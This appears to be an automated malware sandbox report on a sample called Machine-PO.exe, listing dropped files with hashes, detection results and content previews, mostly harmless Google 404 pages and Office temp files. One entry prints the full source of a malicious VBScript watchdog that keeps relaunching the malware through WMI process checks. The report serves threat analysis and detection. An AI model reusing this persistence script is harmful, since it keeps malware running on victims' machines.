                                                                                                              SSDEEP:24:dF/UF5pAU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF5p5t+G+7xLxe0WABNVIqZaVzgA
                                                                                                              MD5:F11D266E874FE642642A74E2C4CE02EE
                                                                                                              SHA1:06C53742E2826DB5391191767CA2D2E1A6F3D806
                                                                                                              SHA-256:DB0EE0922078B7209571BDCE6892EF2C003D15997D6D981E493823EA2BEBF074
                                                                                                              SHA-512:D6ED246CEE36F2E9F290E650E958635D875C4FE8756FE4265A384368AF7ABE3E536006F816A3B43E67BB12930A2D0C91F87B893EEB8482E183A069B108BED733
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                               Preview:
                                                                                                               On error resume next
                                                                                                               Dim strComputer,strProcess,fileset
                                                                                                               strProcess = "._cache_Machine-PO.exe"
                                                                                                               fileset = """C:\Users\user\Desktop\._cache_Machine-PO.exe"""
                                                                                                               strComputer = "."
                                                                                                               Dim objShell
                                                                                                               Set objShell = CreateObject("WScript.Shell")
                                                                                                               Dim fso
                                                                                                               Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                                               while 1
                                                                                                               IF isProcessRunning(strComputer,strProcess) THEN
                                                                                                               ELSE
                                                                                                               objShell.Run fileset
                                                                                                               END IF
                                                                                                               Wend
                                                                                                               FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
                                                                                                               DIM objWMIService, strWMIQuery
                                                                                                               strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
                                                                                                               SET objWMIService = GETOBJECT("winmgmts:" _
                                                                                                               & "{impersonationLevel=impersonate}!\\" _
                                                                                                               & strComputer & "\root\cimv2")
                                                                                                               IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
                                                                                                               isProcessRunning = TRUE
                                                                                                               ELSE
                                                                                                               isProcessRunning = FALSE
                                                                                                               END IF
                                                                                                               END FUNCTION
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254873901113919
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0C+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                              MD5:F0A4B67BBB1D02AA1D7EF9E680C46E70
                                                                                                              SHA1:6EB8819B72C808440B35BA85C5ED0ACF26DF2DA8
                                                                                                              SHA-256:3BA4464B655CDEBADE1902DCE8BA7478E10CC898445C0D0B36F4B169B46E80EB
                                                                                                              SHA-512:62A4071841BB14B307D3414C22F53ACA454629A4D5D8523455B4AC9A80E764D92ECDF7E98B11D848E313169098436BB4275250DC7B6D5B67C611412CB98DE688
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MfdDkp0hMQnFgdkvuPP8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2420487402301195
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0EwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7w+pAZewRDK4mW
                                                                                                              MD5:24559218BD2AFC8F6DAD09BB30D04A0A
                                                                                                              SHA1:D090AE6C30C474A7D57547CAE059C32E9CDA6155
                                                                                                              SHA-256:C0EA93EDCB967CE74035B4D6C34954FABD9A0119D8312831FD1546AB38BBCBA9
                                                                                                              SHA-512:8364B15E908BFF2A3AC3A51F225C0347A8CB2B5696715E2C97B4911C704092803E1847385D8F51ABA6C089EF73841C9BD0CB109E6204579A92485ACA003AB39D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzskGLx0pirT740bHexlaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265532425423776
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                              MD5:30FF218C431F92A5C0A90FB7350B0AFA
                                                                                                              SHA1:1A5A5CAF17A04146E3FCCCBDC5CBD2068D0847FF
                                                                                                              SHA-256:56B71F53C37737B37ECC9836CE61C0CB2355833E7701536C7F36B690CE3528EA
                                                                                                              SHA-512:A5246B8986078307365238F2B527AC4870D231CC7DF3D063DDEA687D39EF23CE3F9653C8308BE4B1ED4E2B8A0030F6EE3A695F0BE16482DA371024550D2D588C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oibuW_hkI17HJpCCXYtwKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26700752367947
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0dBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                              MD5:A998C30AA8C6F3664A709801094CE752
                                                                                                              SHA1:D630C2E60B4410087AF0BDA0AEA28B7B3FAAED92
                                                                                                              SHA-256:82352D125722F97A0EFFE3CEA9170FABF7193C7DB520C7C70EA5AAD05961469A
                                                                                                              SHA-512:FF581687DAA211C4E9CDEE9A48A1E6DA77F4376869C04FCCF344903547DCC9E9CC63B67DD6AA48AEE69E581621677FB05A4E13FB86674DD2F16EA82CB44BA376
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L5Yb08FyhoCH-SlAHuVJbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.257862177020771
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0GXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                              MD5:1876755AF9F400363ECEC607E1D9825E
                                                                                                              SHA1:B060D24055F81907A416FB7DBDF698FAE22F6574
                                                                                                              SHA-256:F2F842BAC8213426A0C965A86977E367C32500367372D092623958451853ABFC
                                                                                                              SHA-512:1971A475BD2E39664E7B09AF0C2371EBDEDA1D577B3E69FD2EDA8D710D737456EFF4EB0DC80CE27967FB274EDD4FAEB670985DCC3BCAE06610903585004BB140
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IKdZHJmWnMymnn-nyViSyg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266848466827146
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                              MD5:3332A41D0E99DA3F4D01639171C4BF7C
                                                                                                              SHA1:14587A3097F270169B529DF37F442C710A71FBF0
                                                                                                              SHA-256:7E06E530A739AB1653378E61A471B3554B5E6FE550A52AE06CEAD19F2C8DF495
                                                                                                              SHA-512:E883DD167A6715B89EFAEFE1BC9C0FB979870E22AAA0B559EC97931029BD55B7354A43B0BEEEDC3ADF35AE20EA00CC2343C9733D6ADDFCB6CAF9AB2D9CF24EC0
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FV-QYT6fMZa8-EGYhmfebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266060521671507
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                              MD5:52EE9F251C252E62869855F3E94DC0FC
                                                                                                              SHA1:EF3B3CC5D6E41290A5FD7DF4E1FC33C9A84E0A74
                                                                                                              SHA-256:C345727E1BE744FCCC1E9255EDBEA182C78D996459DB4B94FCD9028E3A761C01
                                                                                                              SHA-512:78A2125E9C47CE42EC7761C66539F21C724EB5CC719B26FBD87C0EBFC8075B37D492B13C637E59482621D9DCF3D053B5A3AB23D31AC3BD565CF3D2E569D83438
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ppL64n5NZ1WBGTsLRO4evA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.278804614939333
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                              MD5:B3F0A3F414EB57B393ABD775DE664BAF
                                                                                                              SHA1:AF201A239629A49E64CCA0D8043E33319AE7519E
                                                                                                              SHA-256:C9A4BB8AA535D6888E685B4C4D9C37E1291F6D55880847019010A66F36AAB7A4
                                                                                                              SHA-512:02B47C0A3FA88213741DF51C8114025F1F2B2E42AC997279D6D5616CBFF9FE47FDDD7A74DDB1833217D5436952A067D4F56AF1BB8E7A7F639D4FBA5588E6CEC4
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5cBjJI_Fh3zfqYWF3YVtRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265023550665354
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0EdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                              MD5:AC6AE1F7FA485A3237C6359D51458963
                                                                                                              SHA1:C1880CEAFE99955BF7A7CB17400191EAEADC24FE
                                                                                                              SHA-256:D1F88DEB8080BB779E5F49D61B33F271669A6911C3E9DA2D3AD785475365F30D
                                                                                                              SHA-512:8EA9CC8D4E60B47D06CC3D3E1070EBDAB1E7720632C03929676CE0824D4AE799FA8BE69ECB90F17F4542770D89764F58BA276EAFA7CE571F96E951B03307154F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OpYsUxHV9Re1Fkj1dAgDGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.280352182197388
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                              MD5:C7ACB509FD30AAA61340A92270F228BF
                                                                                                              SHA1:90CEFE9029A767B86A5FAD516B83B735FDE4D4D2
                                                                                                              SHA-256:556D558A98A047038D8B58ADF03981EA892345C2ECBC8279588160BB30233CE5
                                                                                                              SHA-512:2A1C8EF1C63D03C5361189AFF988E0CA6C1888333B74F4184CAB52C16D2412CC734F2026DE0A4D8997120F9F554C6B4A8C5C25D5A335A008FC030B8F9AF7F202
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KjFIOS564AwKyjIAtu9CqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264974102821585
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+04h3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z3+pAZewRDK4mW
                                                                                                              MD5:9A7B99A26F8470BB89E6E53317BCECC8
                                                                                                              SHA1:6E7EFB055CA9FF42BA768AA9D85A83B40F463CED
                                                                                                              SHA-256:431138BD606FDA76A1CA5654D949E69E0899B4F02ED5B67350463456BCD579AD
                                                                                                              SHA-512:568733DC2819A1C19DF5381930A0C016CB3813DD7A6BEA19C08741FE4A8A48646E79C3B75DD2BDEB31FCBECDE0FB4B173D3583AE0A0AFD6296D14A05CC8F9126
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oLi-S9UJIqotNrJO_HyLxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261394564221904
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0VGGzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                              MD5:26374D0D4940B7696E19EE1A7E0D3476
                                                                                                              SHA1:349C3396FA8C48106FD83611CE3A5A52D386769A
                                                                                                              SHA-256:8666965261F9E6B264A052304577BF77960CDF8EA9E47A6277EB203A75AAA34D
                                                                                                              SHA-512:A64C5BF3C3B2FF719E50CDE13B19F2502FBBF67A557D5293774D8DC1CB4F324D4390E561BF48136ED599AB1F71FCA677975EF2649C8F60C0BDB56F7E896BAE86
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Ok25HVJDw7ntccb1v7PGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256084589733454
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                              MD5:709DAD2E7EEAB92801D3CE8D73A04B64
                                                                                                              SHA1:65EC956139AD7FFF15B8D68BF51E4E18ABA116A5
                                                                                                              SHA-256:75E63450D338358F26617C89DB787E97FB32BE3D68D77D1D34FF52A44F602BE4
                                                                                                              SHA-512:C0C2B7989821173ABAF623E5A87062362AA22EEED7538490CEFD92F266694C92FD4A014B97E79B210A0A88780ED16FF85BBE3AC2DF10F56D709676C3D3BF2FFD
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HkaRyhn4ZBX2OxKyge1E1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.5231029153786204
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:WH25nJFV:WH2/
                                                                                                              MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                              SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                              SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                              SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                              Malicious:false
                                                                                                              Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):3.746897789531007
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:12 2024, mtime=Mon Dec 30 09:25:12 2024, atime=Mon Dec 30 09:25:12 2024, length=1436672, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1808
                                                                                                              Entropy (8bit):3.418064229045134
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:87RwO4WeEM0XQA1U8E2+s9T4Il1IeOIeSm:87RwmxM03Nr9MIlXO9S
                                                                                                              MD5:09B043739983D4467E641BBF6ED90D8C
